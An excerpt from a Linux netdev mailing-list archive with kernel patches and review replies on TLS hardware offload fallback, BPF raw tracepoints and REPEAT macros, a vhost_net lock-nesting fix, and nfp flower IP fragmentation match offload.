>> +    int remaining, buf_len, resync_sgs, rc, i = 0;
>> +    void *buf, *dummy_buf, *iv, *aad;
>> +    struct scatterlist *sg_in, sg_out[3];
>> +    u32 tcp_seq = ntohl(tcp_hdr(skb)->seq);
>> +    struct aead_request *aead_req;
>> +    struct sk_buff *nskb = NULL;
>> +    struct tls_record_info *record;
>> +    unsigned long flags;
>> +    s32 sync_size;
>> +    u64 rcd_sn;
>> +
>> +    /* worst case is:
>> +     * MAX_SKB_FRAGS in tls_record_info
>> +     * MAX_SKB_FRAGS + 1 in SKB head and frags.
>> +     */
>> +    int sg_in_max_elements = 2 * MAX_SKB_FRAGS + 1;
>> +
>> +    if (!payload_len)
>> +        return skb;
>> +
>> +    sg_in = kmalloc_array(sg_in_max_elements, sizeof(*sg_in), 
>> GFP_ATOMIC);
>> +    if (!sg_in)
>> +        goto free_orig;
>> +
>> +    sg_init_table(sg_in, sg_in_max_elements);
>> +    sg_init_table(sg_out, ARRAY_SIZE(sg_out));
>> +
>> +    spin_lock_irqsave(&ctx->lock, flags);
>> +    record = tls_get_record(ctx, tcp_seq, &rcd_sn);
>> +    if (!record) {
>> +        spin_unlock_irqrestore(&ctx->lock, flags);
>> +        WARN(1, "Record not found for seq %u\n", tcp_seq);
>> +        goto free_sg;
>> +    }
>> +
>> +    sync_size = tcp_seq - tls_record_start_seq(record);
>> +    if (sync_size < 0) {
>> +        int is_start_marker = tls_record_is_start_marker(record);
>> +
>> +        spin_unlock_irqrestore(&ctx->lock, flags);
>> +        if (!is_start_marker)
>> +        /* This should only occur if the relevant record was
>> +         * already acked. In that case it should be ok
>> +         * to drop the packet and avoid retransmission.
>> +         *
>> +         * There is a corner case where the packet contains
>> +         * both an acked and a non-acked record.
>> +         * We currently don't handle that case and rely
>> +         * on TCP to retranmit a packet that doesn't contain
>> +         * already acked payload.
>> +         */
>> +            goto free_orig;
> 
> Again, let's keep the "if ..." closer to the one line being protected.
> 

Fixed.

>> +
>> +        if (payload_len > -sync_size) {
>> +            WARN(1, "Fallback of partially offloaded packets is not 
>> supported\n");
>> +            goto free_sg;
>> +        } else {
>> +            return skb;
>> +        }
>> +    }
>> +
>> +    remaining = sync_size;
> 
> It would be a bit clearer, and more future safe, to set i=0 here rather 
> than rely on the initialization way back at the top of the function.  In 
> fact, why not use a normal for-loop?
>      for (i = 0; remaining > 0; i++)
> 

Sure.

>> +    while (remaining > 0) {
>> +        skb_frag_t *frag = &record->frags[i];
>> +
>> +        __skb_frag_ref(frag);
>> +        sg_set_page(sg_in + i, skb_frag_page(frag),
>> +                skb_frag_size(frag), frag->page_offset);
>> +
>> +        remaining -= skb_frag_size(frag);
>> +
>> +        if (remaining < 0)
>> +            sg_in[i].length += remaining;
>> +
>> +        i++;
>> +    }
>> +    spin_unlock_irqrestore(&ctx->lock, flags);
>> +    resync_sgs = i;
>> +
>> +    aead_req = tls_alloc_aead_request(ctx->aead_send, GFP_ATOMIC);
>> +    if (!aead_req)
>> +        goto put_sg;
>> +
>> +    buf_len = TLS_CIPHER_AES_GCM_128_SALT_SIZE +
>> +          TLS_CIPHER_AES_GCM_128_IV_SIZE +
>> +          TLS_AAD_SPACE_SIZE +
>> +          sync_size +
>> +          tls_ctx->tag_size;
>> +    buf = kmalloc(buf_len, GFP_ATOMIC);
>> +    if (!buf)
>> +        goto free_req;
>> +
>> +    nskb = alloc_skb(skb_headroom(skb) + skb->len, GFP_ATOMIC);
>> +    if (!nskb)
>> +        goto free_buf;
>> +
>> +    skb_reserve(nskb, skb_headroom(skb));
>> +
>> +    iv = buf;
>> +
>> +    memcpy(iv, tls_ctx->crypto_send_aes_gcm_128.salt,
>> +           TLS_CIPHER_AES_GCM_128_SALT_SIZE);
>> +    aad = buf + TLS_CIPHER_AES_GCM_128_SALT_SIZE +
>> +          TLS_CIPHER_AES_GCM_128_IV_SIZE;
>> +    dummy_buf = aad + TLS_AAD_SPACE_SIZE;
>> +
>> +    sg_set_buf(&sg_out[0], dummy_buf, sync_size);
>> +    sg_set_buf(&sg_out[1], nskb->data + tcp_payload_offset,
>> +           payload_len);
>> +    /* Add room for authentication tag produced by crypto */
>> +    dummy_buf += sync_size;
>> +    sg_set_buf(&sg_out[2], dummy_buf, tls_ctx->tag_size);
>> +    rc = skb_to_sgvec(skb, &sg_in[i], tcp_payload_offset,
>> +              payload_len);
>> +    if (rc < 0)
>> +        goto free_nskb;
>> +
>> +    rc = tls_enc_records(aead_req, ctx->aead_send, sg_in, sg_out, 
>> aad, iv,
>> +                 rcd_sn, sync_size + payload_len);
>> +    if (rc < 0)
>> +        goto free_nskb;
>> +
>> +    complete_skb(nskb, skb, tcp_payload_offset);
>> +
>> +    /* validate_xmit_skb_list assumes that if the skb wasn't segmented
>> +     * nskb->prev will point to the skb itself
>> +     */
>> +    nskb->prev = nskb;
>> +free_buf:
>> +    kfree(buf);
>> +free_req:
>> +    kfree(aead_req);
>> +put_sg:
>> +    for (i = 0; i < resync_sgs; i++)
>> +        put_page(sg_page(&sg_in[i]));
>> +free_sg:
>> +    kfree(sg_in);
>> +free_orig:
>> +    kfree_skb(skb);
>> +    return nskb;
>> +
>> +free_nskb:
>> +    kfree_skb(nskb);
>> +    nskb = NULL;
>> +    goto free_buf;
>> +}
>> +
>> +struct sk_buff *tls_validate_xmit_skb(struct sock *sk,
>> +                      struct net_device *dev,
>> +                      struct sk_buff *skb)
>> +{
>> +    if (dev == tls_get_ctx(sk)->netdev)
>> +        return skb;
>> +
>> +    return tls_sw_fallback(sk, skb);
>> +}
>> +
>> +int tls_sw_fallback_init(struct sock *sk,
>> +             struct tls_offload_context *offload_ctx,
>> +             struct tls_crypto_info *crypto_info)
>> +{
>> +    const u8 *key;
>> +    int rc;
>> +
>> +    offload_ctx->aead_send =
>> +        crypto_alloc_aead("gcm(aes)", 0, CRYPTO_ALG_ASYNC);
>> +    if (IS_ERR(offload_ctx->aead_send)) {
>> +        rc = PTR_ERR(offload_ctx->aead_send);
>> +        pr_err_ratelimited("crypto_alloc_aead failed rc=%d\n", rc);
>> +        offload_ctx->aead_send = NULL;
>> +        goto err_out;
>> +    }
>> +
>> +    key = ((struct tls12_crypto_info_aes_gcm_128 *)crypto_info)->key;
>> +
>> +    rc = crypto_aead_setkey(offload_ctx->aead_send, key,
>> +                TLS_CIPHER_AES_GCM_128_KEY_SIZE);
>> +    if (rc)
>> +        goto free_aead;
>> +
>> +    rc = crypto_aead_setauthsize(offload_ctx->aead_send,
>> +                     TLS_CIPHER_AES_GCM_128_TAG_SIZE);
>> +    if (rc)
>> +        goto free_aead;
>> +
>> +    return 0;
>> +free_aead:
>> +    crypto_free_aead(offload_ctx->aead_send);
>> +err_out:
>> +    return rc;
>> +}
>> diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
>> index d824d548447e..e0dface33017 100644
>> --- a/net/tls/tls_main.c
>> +++ b/net/tls/tls_main.c
>> @@ -54,6 +54,9 @@ enum {
>>   enum {
>>       TLS_BASE_TX,
>>       TLS_SW_TX,
>> +#ifdef CONFIG_TLS_DEVICE
>> +    TLS_HW_TX,
>> +#endif
>>       TLS_NUM_CONFIG,
>>   };
>> @@ -416,11 +419,19 @@ static int do_tls_setsockopt_tx(struct sock *sk, 
>> char __user *optval,
>>           goto err_crypto_info;
>>       }
>> -    /* currently SW is default, we will have ethtool in future */
>> -    rc = tls_set_sw_offload(sk, ctx);
>> -    tx_conf = TLS_SW_TX;
>> -    if (rc)
>> -        goto err_crypto_info;
>> +#ifdef CONFIG_TLS_DEVICE
>> +    rc = tls_set_device_offload(sk, ctx);
>> +    tx_conf = TLS_HW_TX;
>> +    if (rc) {
>> +#else
>> +    {
>> +#endif
>> +        /* if HW offload fails fallback to SW */
>> +        rc = tls_set_sw_offload(sk, ctx);
>> +        tx_conf = TLS_SW_TX;
>> +        if (rc)
>> +            goto err_crypto_info;
>> +    }
>>       ctx->tx_conf = tx_conf;
>>       update_sk_prot(sk, ctx);
>> @@ -473,6 +484,12 @@ static void build_protos(struct proto *prot, 
>> struct proto *base)
>>       prot[TLS_SW_TX] = prot[TLS_BASE_TX];
>>       prot[TLS_SW_TX].sendmsg        = tls_sw_sendmsg;
>>       prot[TLS_SW_TX].sendpage    = tls_sw_sendpage;
>> +
>> +#ifdef CONFIG_TLS_DEVICE
>> +    prot[TLS_HW_TX] = prot[TLS_SW_TX];
>> +    prot[TLS_HW_TX].sendmsg        = tls_device_sendmsg;
>> +    prot[TLS_HW_TX].sendpage    = tls_device_sendpage;
>> +#endif
>>   }
>>   static int tls_init(struct sock *sk)
>> @@ -531,6 +548,9 @@ static int __init tls_register(void)
>>   {
>>       build_protos(tls_prots[TLSV4], &tcp_prot);
>> +#ifdef CONFIG_TLS_DEVICE
>> +    tls_device_init();
>> +#endif
>>       tcp_register_ulp(&tcp_tls_ulp_ops);
>>       return 0;
>> @@ -539,6 +559,9 @@ static int __init tls_register(void)
>>   static void __exit tls_unregister(void)
>>   {
>>       tcp_unregister_ulp(&tcp_tls_ulp_ops);
>> +#ifdef CONFIG_TLS_DEVICE
>> +    tls_device_cleanup();
>> +#endif
>>   }
>>   module_init(tls_register);
>>

^ permalink raw reply

* Re: [PATCH v2 bpf-next 5/8] bpf: introduce BPF_RAW_TRACEPOINT
From: Daniel Borkmann @ 2018-03-26  7:53 UTC (permalink / raw)
  To: Alexei Starovoitov, davem
  Cc: torvalds, peterz, rostedt, netdev, kernel-team, linux-api
In-Reply-To: <cea19b0f-0420-0620-2240-954a81e22659@fb.com>

On 03/24/2018 02:43 AM, Alexei Starovoitov wrote:
> On 3/23/18 5:58 PM, Alexei Starovoitov wrote:
>> On 3/23/18 4:13 PM, Daniel Borkmann wrote:
>>> On 03/22/2018 04:41 PM, Alexei Starovoitov wrote:
>>>> On 3/22/18 2:43 AM, Daniel Borkmann wrote:
>>>>> On 03/21/2018 07:54 PM, Alexei Starovoitov wrote:
[...]
>>>> I picked 6 as a good compromise and used it twice in bpf_trace_run1x()
>>>> Similar thing possible for u64 arg1, u64 arg2, ...
>>>> but it will be harder to read.
>>>> Looking forward what you can come up with.
>>>
>>> Just took a quick look, so the below one would work for generating the
>>> signature and function. I did till 9 here:
>>>
>>> #define UNPACK(...)            __VA_ARGS__
>>> #define REPEAT_1(FN, DL, X, ...)    FN(X)
>>> #define REPEAT_2(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_1(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_3(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_2(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_4(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_3(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_5(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_4(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_6(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_5(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_7(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_6(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_8(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_7(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT_9(FN, DL, X, ...)    FN(X) UNPACK DL REPEAT_8(FN, DL,
>>> __VA_ARGS__)
>>> #define REPEAT(X, FN, DL, ...)        REPEAT_##X(FN, DL, __VA_ARGS__)
>>>
>>> #define SARG(X)        u64 arg##X
>>> #define COPY(X)        args[X] = arg##X
>>>
>>> #define __DL_COM    (,)
>>> #define __DL_SEM    (;)
>>>
>>> #define __SEQ        0, 1, 2, 3, 4, 5, 6, 7, 8, 9
>>>
>>> #define BPF_TRACE_DECL_x(x)                        \
>>>     void bpf_trace_run##x(struct bpf_prog *prog,            \
>>>                   REPEAT(x, SARG, __DL_COM, __SEQ))
>>> #define BPF_TRACE_DEFN_x(x)                        \
>>>     void bpf_trace_run##x(struct bpf_prog *prog,            \
>>>                   REPEAT(x, SARG, __DL_COM, __SEQ))        \
>>>     {                                \
>>>         u64 args[x];                        \
>>>         REPEAT(x, COPY, __DL_SEM, __SEQ);            \
>>>         __bpf_trace_run(prog, args);                \
>>>     }                                \
>>>     EXPORT_SYMBOL_GPL(bpf_trace_run##x)
>>>
>>> So doing a ...
>>>
>>> BPF_TRACE_DECL_x(5);
>>> BPF_TRACE_DEFN_x(5);
>>
>> interestingly that in addition to above defining
>> #define __REPEAT(X, FN, DL, ...) REPEAT_##X(FN, DL, __VA_ARGS__)
>> to allow recursive expansion and doing
>> __REPEAT(12, BPF_TRACE_DECL_x, __DL_SEM, __SEQ_1_12);
>> almost works...
>> I'm guessing it's hitting preprocessor internal limit on
>> number of expressions to expand.
>> It expands 1-6 nicely and 7-12 are partially expanded :)
> 
> it's not the limit I'm hitting, but self referential issue.
> Exactly half gets expanded.
> I don't think there is an easy workaround other
> than duplicating the whole chain of REPEAT macro twice
> with slightly different name.

Hmm, that is kind of annoying, probably worth filing a bug on gcc, we still
won't be able to use it near term though.

Given it expands just fine from 1-6 arguments, I think Steven had a good
choice on upper limit of 6 args then (including build error with above). ;-)

Thanks,
Daniel

^ permalink raw reply

* [PATCH net] vhost_net: add missing lock nesting notation
From: Jason Wang @ 2018-03-26  8:10 UTC (permalink / raw)
  To: mst, kvm, virtualization, netdev, linux-kernel

We try to hold TX virtqueue mutex in vhost_net_rx_peek_head_len()
after RX virtqueue mutex is held in handle_rx(). This requires an
appropriate lock nesting notation to calm down deadlock detector.

Fixes: 0308813724606 ("vhost_net: basic polling support")
Reported-by: syzbot+7f073540b1384a614e09@syzkaller.appspotmail.com
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
 drivers/vhost/net.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
index 8139bc7..12bcfba 100644
--- a/drivers/vhost/net.c
+++ b/drivers/vhost/net.c
@@ -630,7 +630,7 @@ static int vhost_net_rx_peek_head_len(struct vhost_net *net, struct sock *sk)
 
 	if (!len && vq->busyloop_timeout) {
 		/* Both tx vq and rx socket were polled here */
-		mutex_lock(&vq->mutex);
+		mutex_lock_nested(&vq->mutex, 1);
 		vhost_disable_notify(&net->dev, vq);
 
 		preempt_disable();
@@ -763,7 +763,7 @@ static void handle_rx(struct vhost_net *net)
 	struct iov_iter fixup;
 	__virtio16 num_buffers;
 
-	mutex_lock(&vq->mutex);
+	mutex_lock_nested(&vq->mutex, 0);
 	sock = vq->private_data;
 	if (!sock)
 		goto out;
-- 
2.7.4

^ permalink raw reply related

* [PATCH net-next 0/2] nfp: flower: add ip fragmentation offloading support
From: Simon Horman @ 2018-03-26  8:16 UTC (permalink / raw)
  To: David Miller; +Cc: netdev, oss-drivers, Pieter Jansen van Vuuren, Simon Horman

Pieter Jansen van Vuuren says:

This set allows offloading IP fragmentation classification. It Implements
ip fragmentation match offloading for both IPv4 and IPv6 and offloads
frag, nofrag, first and nofirstfrag classification.

Pieter Jansen van Vuuren (2):
  nfp: flower: refactor shared ip header in match offload
  nfp: flower: implement ip fragmentation match offload

 drivers/net/ethernet/netronome/nfp/flower/cmsg.h   | 22 ++++---
 drivers/net/ethernet/netronome/nfp/flower/match.c  | 73 ++++++++++++----------
 .../net/ethernet/netronome/nfp/flower/offload.c    | 15 +++++
 3 files changed, 68 insertions(+), 42 deletions(-)

-- 
2.11.0

^ permalink raw reply

* [PATCH net-next 1/2] nfp: flower: refactor shared ip header in match offload
From: Simon Horman @ 2018-03-26  8:16 UTC (permalink / raw)
  To: David Miller; +Cc: netdev, oss-drivers, Pieter Jansen van Vuuren, Simon Horman
In-Reply-To: <20180326081638.13979-1-simon.horman@netronome.com>

From: Pieter Jansen van Vuuren <pieter.jansenvanvuuren@netronome.com>

Refactored shared ip header code for IPv4 and IPv6 in match offload.

Signed-off-by: Pieter Jansen van Vuuren <pieter.jansenvanvuuren@netronome.com>
Reviewed-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Signed-off-by: Simon Horman <simon.horman@netronome.com>
---
 drivers/net/ethernet/netronome/nfp/flower/cmsg.h  | 19 +++----
 drivers/net/ethernet/netronome/nfp/flower/match.c | 61 +++++++++++------------
 2 files changed, 38 insertions(+), 42 deletions(-)

diff --git a/drivers/net/ethernet/netronome/nfp/flower/cmsg.h b/drivers/net/ethernet/netronome/nfp/flower/cmsg.h
index 28c1cd5b823b..db32f129aded 100644
--- a/drivers/net/ethernet/netronome/nfp/flower/cmsg.h
+++ b/drivers/net/ethernet/netronome/nfp/flower/cmsg.h
@@ -260,6 +260,13 @@ struct nfp_flower_tp_ports {
 	__be16 port_dst;
 };
 
+struct nfp_flower_ip_ext {
+	u8 tos;
+	u8 proto;
+	u8 ttl;
+	u8 flags;
+};
+
 /* L3 IPv4 details (3W/12B)
  *    3                   2                   1
  *  1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
@@ -272,10 +279,7 @@ struct nfp_flower_tp_ports {
  * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  */
 struct nfp_flower_ipv4 {
-	u8 tos;
-	u8 proto;
-	u8 ttl;
-	u8 flags;
+	struct nfp_flower_ip_ext ip_ext;
 	__be32 ipv4_src;
 	__be32 ipv4_dst;
 };
@@ -284,7 +288,7 @@ struct nfp_flower_ipv4 {
  *    3                   2                   1
  *  1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0
  * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
- * |    DSCP   |ECN|   protocol    |          reserved             |
+ * |    DSCP   |ECN|   protocol    |      ttl      |     flags     |
  * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  * |   ipv6_exthdr   | res |            ipv6_flow_label            |
  * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
@@ -306,10 +310,7 @@ struct nfp_flower_ipv4 {
  * +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  */
 struct nfp_flower_ipv6 {
-	u8 tos;
-	u8 proto;
-	u8 ttl;
-	u8 reserved;
+	struct nfp_flower_ip_ext ip_ext;
 	__be32 ipv6_flow_label_exthdr;
 	struct in6_addr ipv6_src;
 	struct in6_addr ipv6_dst;
diff --git a/drivers/net/ethernet/netronome/nfp/flower/match.c b/drivers/net/ethernet/netronome/nfp/flower/match.c
index b3bc8279d4fb..26110670ba13 100644
--- a/drivers/net/ethernet/netronome/nfp/flower/match.c
+++ b/drivers/net/ethernet/netronome/nfp/flower/match.c
@@ -146,26 +146,15 @@ nfp_flower_compile_tport(struct nfp_flower_tp_ports *frame,
 }
 
 static void
-nfp_flower_compile_ipv4(struct nfp_flower_ipv4 *frame,
-			struct tc_cls_flower_offload *flow,
-			bool mask_version)
+nfp_flower_compile_ip_ext(struct nfp_flower_ip_ext *frame,
+			  struct tc_cls_flower_offload *flow,
+			  bool mask_version)
 {
 	struct fl_flow_key *target = mask_version ? flow->mask : flow->key;
-	struct flow_dissector_key_ipv4_addrs *addr;
-	struct flow_dissector_key_basic *basic;
-
-	memset(frame, 0, sizeof(struct nfp_flower_ipv4));
-
-	if (dissector_uses_key(flow->dissector,
-			       FLOW_DISSECTOR_KEY_IPV4_ADDRS)) {
-		addr = skb_flow_dissector_target(flow->dissector,
-						 FLOW_DISSECTOR_KEY_IPV4_ADDRS,
-						 target);
-		frame->ipv4_src = addr->src;
-		frame->ipv4_dst = addr->dst;
-	}
 
 	if (dissector_uses_key(flow->dissector, FLOW_DISSECTOR_KEY_BASIC)) {
+		struct flow_dissector_key_basic *basic;
+
 		basic = skb_flow_dissector_target(flow->dissector,
 						  FLOW_DISSECTOR_KEY_BASIC,
 						  target);
@@ -204,13 +193,34 @@ nfp_flower_compile_ipv4(struct nfp_flower_ipv4 *frame,
 }
 
 static void
+nfp_flower_compile_ipv4(struct nfp_flower_ipv4 *frame,
+			struct tc_cls_flower_offload *flow,
+			bool mask_version)
+{
+	struct fl_flow_key *target = mask_version ? flow->mask : flow->key;
+	struct flow_dissector_key_ipv4_addrs *addr;
+
+	memset(frame, 0, sizeof(struct nfp_flower_ipv4));
+
+	if (dissector_uses_key(flow->dissector,
+			       FLOW_DISSECTOR_KEY_IPV4_ADDRS)) {
+		addr = skb_flow_dissector_target(flow->dissector,
+						 FLOW_DISSECTOR_KEY_IPV4_ADDRS,
+						 target);
+		frame->ipv4_src = addr->src;
+		frame->ipv4_dst = addr->dst;
+	}
+
+	nfp_flower_compile_ip_ext(&frame->ip_ext, flow, mask_version);
+}
+
+static void
 nfp_flower_compile_ipv6(struct nfp_flower_ipv6 *frame,
 			struct tc_cls_flower_offload *flow,
 			bool mask_version)
 {
 	struct fl_flow_key *target = mask_version ? flow->mask : flow->key;
 	struct flow_dissector_key_ipv6_addrs *addr;
-	struct flow_dissector_key_basic *basic;
 
 	memset(frame, 0, sizeof(struct nfp_flower_ipv6));
 
@@ -223,22 +233,7 @@ nfp_flower_compile_ipv6(struct nfp_flower_ipv6 *frame,
 		frame->ipv6_dst = addr->dst;
 	}
 
-	if (dissector_uses_key(flow->dissector, FLOW_DISSECTOR_KEY_BASIC)) {
-		basic = skb_flow_dissector_target(flow->dissector,
-						  FLOW_DISSECTOR_KEY_BASIC,
-						  target);
-		frame->proto = basic->ip_proto;
-	}
-
-	if (dissector_uses_key(flow->dissector, FLOW_DISSECTOR_KEY_IP)) {
-		struct flow_dissector_key_ip *flow_ip;
-
-		flow_ip = skb_flow_dissector_target(flow->dissector,
-						    FLOW_DISSECTOR_KEY_IP,
-						    target);
-		frame->tos = flow_ip->tos;
-		frame->ttl = flow_ip->ttl;
-	}
+	nfp_flower_compile_ip_ext(&frame->ip_ext, flow, mask_version);
 }
 
 static void
-- 
2.11.0

^ permalink raw reply related

* [PATCH net-next 2/2] nfp: flower: implement ip fragmentation match offload
From: Simon Horman @ 2018-03-26  8:16 UTC (permalink / raw)
  To: David Miller; +Cc: netdev, oss-drivers, Pieter Jansen van Vuuren, Simon Horman
In-Reply-To: <20180326081638.13979-1-simon.horman@netronome.com>

From: Pieter Jansen van Vuuren <pieter.jansenvanvuuren@netronome.com>

Implement ip fragmentation match offloading for both IPv4 and IPv6. Allows
offloading frag, nofrag, first and nofirstfrag classification.

Signed-off-by: Pieter Jansen van Vuuren <pieter.jansenvanvuuren@netronome.com>
Reviewed-by: Jakub Kicinski <jakub.kicinski@netronome.com>
Signed-off-by: Simon Horman <simon.horman@netronome.com>
---
 drivers/net/ethernet/netronome/nfp/flower/cmsg.h    |  3 +++
 drivers/net/ethernet/netronome/nfp/flower/match.c   | 12 ++++++++++++
 drivers/net/ethernet/netronome/nfp/flower/offload.c | 15 +++++++++++++++
 3 files changed, 30 insertions(+)

diff --git a/drivers/net/ethernet/netronome/nfp/flower/cmsg.h b/drivers/net/ethernet/netronome/nfp/flower/cmsg.h
index db32f129aded..3f46d836d1b8 100644
--- a/drivers/net/ethernet/netronome/nfp/flower/cmsg.h
+++ b/drivers/net/ethernet/netronome/nfp/flower/cmsg.h
@@ -61,6 +61,9 @@
 #define NFP_FLOWER_MASK_MPLS_BOS	BIT(8)
 #define NFP_FLOWER_MASK_MPLS_Q		BIT(0)
 
+#define NFP_FL_IP_FRAG_FIRST		BIT(7)
+#define NFP_FL_IP_FRAGMENTED		BIT(6)
+
 /* Compressed HW representation of TCP Flags */
 #define NFP_FL_TCP_FLAG_URG		BIT(4)
 #define NFP_FL_TCP_FLAG_PSH		BIT(3)
diff --git a/drivers/net/ethernet/netronome/nfp/flower/match.c b/drivers/net/ethernet/netronome/nfp/flower/match.c
index 26110670ba13..91935405f586 100644
--- a/drivers/net/ethernet/netronome/nfp/flower/match.c
+++ b/drivers/net/ethernet/netronome/nfp/flower/match.c
@@ -190,6 +190,18 @@ nfp_flower_compile_ip_ext(struct nfp_flower_ip_ext *frame,
 		if (tcp_flags & TCPHDR_URG)
 			frame->flags |= NFP_FL_TCP_FLAG_URG;
 	}
+
+	if (dissector_uses_key(flow->dissector, FLOW_DISSECTOR_KEY_CONTROL)) {
+		struct flow_dissector_key_control *key;
+
+		key = skb_flow_dissector_target(flow->dissector,
+						FLOW_DISSECTOR_KEY_CONTROL,
+						target);
+		if (key->flags & FLOW_DIS_IS_FRAGMENT)
+			frame->flags |= NFP_FL_IP_FRAGMENTED;
+		if (key->flags & FLOW_DIS_FIRST_FRAG)
+			frame->flags |= NFP_FL_IP_FRAG_FIRST;
+	}
 }
 
 static void
diff --git a/drivers/net/ethernet/netronome/nfp/flower/offload.c b/drivers/net/ethernet/netronome/nfp/flower/offload.c
index f3586c519805..114d2ab02a38 100644
--- a/drivers/net/ethernet/netronome/nfp/flower/offload.c
+++ b/drivers/net/ethernet/netronome/nfp/flower/offload.c
@@ -48,6 +48,10 @@
 	(TCPHDR_FIN | TCPHDR_SYN | TCPHDR_RST | \
 	 TCPHDR_PSH | TCPHDR_URG)
 
+#define NFP_FLOWER_SUPPORTED_CTLFLAGS \
+	(FLOW_DIS_IS_FRAGMENT | \
+	 FLOW_DIS_FIRST_FRAG)
+
 #define NFP_FLOWER_WHITELIST_DISSECTOR \
 	(BIT(FLOW_DISSECTOR_KEY_CONTROL) | \
 	 BIT(FLOW_DISSECTOR_KEY_BASIC) | \
@@ -322,6 +326,17 @@ nfp_flower_calculate_key_layers(struct nfp_app *app,
 		}
 	}
 
+	if (dissector_uses_key(flow->dissector, FLOW_DISSECTOR_KEY_CONTROL)) {
+		struct flow_dissector_key_control *key_ctl;
+
+		key_ctl = skb_flow_dissector_target(flow->dissector,
+						    FLOW_DISSECTOR_KEY_CONTROL,
+						    flow->key);
+
+		if (key_ctl->flags & ~NFP_FLOWER_SUPPORTED_CTLFLAGS)
+			return -EOPNOTSUPP;
+	}
+
 	ret_key_ls->key_layer = key_layer;
 	ret_key_ls->key_layer_two = key_layer_two;
 	ret_key_ls->key_size = key_size;
-- 
2.11.0

^ permalink raw reply related

* Re: [PATCH V3 net-next 06/14] net/tls: Add generic NIC offload infrastructure
From: Shannon Nelson @ 2018-03-26  8:18 UTC (permalink / raw)
  To: Boris Pismenny, Saeed Mahameed, David S. Miller
  Cc: netdev, Dave Watson, Ilya Lesokhin, Aviad Yehezkel
In-Reply-To: <21dfaf9c-2910-d5d3-d75a-c749f717cee1@mellanox.com>

On 3/26/2018 12:10 AM, Boris Pismenny wrote:
> Hi Shannon,
> 
> On 3/23/2018 11:21 PM, Shannon Nelson wrote:
>> On 3/22/2018 3:33 PM, Saeed Mahameed wrote:
>>> From: Ilya Lesokhin <ilyal@mellanox.com>
>>>

Thanks, Boris, these sound fine.
sln

^ permalink raw reply

* Re: [PATCH bpf-next 0/2] bpf_verifier_log changes
From: Daniel Borkmann @ 2018-03-26  8:27 UTC (permalink / raw)
  To: Martin KaFai Lau, netdev; +Cc: Alexei Starovoitov, kernel-team
In-Reply-To: <20180324184423.3053682-1-kafai@fb.com>

On 03/24/2018 07:44 PM, Martin KaFai Lau wrote:
> This patch set has some changes and clean-up works for
> the bpf_verifier_log.  They are the prep works for the
> BTF (BPF Type Format).
> 
> Martin KaFai Lau (2):
>   bpf: Rename bpf_verifer_log
>   bpf: Add bpf_verifier_vlog() and bpf_verifier_log_needed()
> 
>  include/linux/bpf_verifier.h | 13 ++++++++++---
>  kernel/bpf/verifier.c        | 21 ++++++++++++---------
>  2 files changed, 22 insertions(+), 12 deletions(-)
> 

Applied to bpf-next, thanks Martin!

^ permalink raw reply

* Re: [PATCH v5 bpf-next 00/10] bpf, tracing: introduce bpf raw tracepoints
From: Daniel Borkmann @ 2018-03-26  8:28 UTC (permalink / raw)
  To: Alexei Starovoitov, davem
  Cc: torvalds, peterz, rostedt, netdev, kernel-team, linux-api
In-Reply-To: <20180324023038.938665-1-ast@fb.com>

On 03/24/2018 03:30 AM, Alexei Starovoitov wrote:
> From: Alexei Starovoitov <ast@kernel.org>
> 
> v4->v5:
> - adopted Daniel's fancy REPEAT macro in bpf_trace.c in patch 7
>   
> v3->v4:
> - adopted Linus's CAST_TO_U64 macro to cast any integer, pointer, or small
>   struct to u64. That nicely reduced the size of patch 1
> 
> v2->v3:
> - with Linus's suggestion introduced generic COUNT_ARGS and CONCATENATE macros
>   (or rather moved them from apparmor)
>   that cleaned up patches 6 and 7
> - added patch 4 to refactor trace_iwlwifi_dev_ucode_error() from 17 args to 4
>   Now any tracepoint with >12 args will have build error
> 
> v1->v2:
> - simplified api by combing bpf_raw_tp_open(name) + bpf_attach(prog_fd) into
>   bpf_raw_tp_open(name, prog_fd) as suggested by Daniel.
>   That simplifies bpf_detach as well which is now simple close() of fd.
> - fixed memory leak in error path which was spotted by Daniel.
> - fixed bpf_get_stackid(), bpf_perf_event_output() called from raw tracepoints
> - added more tests
> - fixed allyesconfig build caught by buildbot
> 
> v1:
> This patch set is a different way to address the pressing need to access
> task_struct pointers in sched tracepoints from bpf programs.
> 
> The first approach simply added these pointers to sched tracepoints:
> https://lkml.org/lkml/2017/12/14/753
> which Peter nacked.
> Few options were discussed and eventually the discussion converged on
> doing bpf specific tracepoint_probe_register() probe functions.
> Details here:
> https://lkml.org/lkml/2017/12/20/929
> 
> Patch 1 is kernel wide cleanup of pass-struct-by-value into
> pass-struct-by-reference into tracepoints.
> 
